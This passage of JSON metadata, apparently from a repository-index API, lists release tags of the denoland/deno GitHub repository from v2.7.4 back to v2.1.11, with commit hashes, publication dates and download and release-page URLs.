2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.